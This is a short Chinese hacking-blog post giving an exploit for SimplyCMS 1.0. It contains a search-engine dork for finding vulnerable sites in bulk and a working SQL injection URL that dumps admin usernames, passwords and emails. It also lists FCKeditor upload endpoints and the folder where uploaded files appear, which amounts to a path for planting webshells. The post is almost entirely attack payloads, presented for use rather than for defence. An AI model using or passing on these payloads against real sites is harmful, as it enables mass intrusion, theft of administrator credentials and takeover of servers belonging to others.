黑侠网络
  • 添加菜单
当前位置:黑侠网络 > 技术教程 > SimplyCMS 1.0 SQl注入和上传漏洞
matrix 技术教程 2012-05-28

SimplyCMS 1.0 SQl注入和上传漏洞

批量:inurl:”index.php?subid=” “Powered by DST – SimplyCMS”
EXP:
http://127.0.0.1/index.php?subid=7[sql]
http://127.0.0.1/index.php?subid=7’+and+1=2+union+select+group_concat(ct,0x3a,username,0x3a,adminpass,0x3a,adminemail)+from+adminconf— –
后台登入
http://127.0.0.1/cms/index.php
上传漏洞
http://127.0.0.1/cms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
http://127.0.0.1/cms/FCKeditor/editor/filemanager/browser/default/connectors/test.html
http://127.0.0.1/cms/FCKeditor/editor/filemanager/upload/test.html
http://127.0.0.1/cms/FCKeditor/editor/filemanager/browser/default/frmupload.html
你的文件地址:
http://127.0.0.1/cms/myFiles/Image/

黑侠网络,免费分享互联网!
黑侠网络 » SimplyCMS 1.0 SQl注入和上传漏洞

matrix 普通

分享到:
上一篇
正确设置php-fpm和nginx防止网站被黑
下一篇
赛门铁克Web网关5.0.2.8命令执行漏洞

相关推荐

php+mysql注入常用工具集

php+mysql注入常用工具集

访问作弊:给数据库中点击数字段增加一个随机数

访问作弊:给数据库中点击数字段增加一个随机数

Tomcat后台提权小技巧

Tomcat后台提权小技巧

www.milw0rm.com关闭一年多了吧…

www.milw0rm.com关闭一年多了吧…

标签
aspxspy DarkBlade ddos ewebeditor fckeditor godaddy-500-error godaddy域名续费优惠券 godaddy空间错误 jspspy linux-Centos-VPS matrix metasploit milw0rm milw0rm.com milw0rm关闭 milw0rm网站 mysql netifera phpcms2008sp4 phpcms火车头采集器 phpcms采集 renrencom seo seo插件 SeraWebInfo w3 total cache webshell提权 web压力测试 wordpress wordpress优化 wordpress插件 xss 上传漏洞 入侵安全检测 旁注 百姓网 网站压力测试 网站被入侵 网站负载能力测试 网络安全 网络安全维护 防ddos 黑侠网络 黑客 黑客学习
© 2018 粤ICP备2022010071号 粤ICP备2022010071号
黑侠网络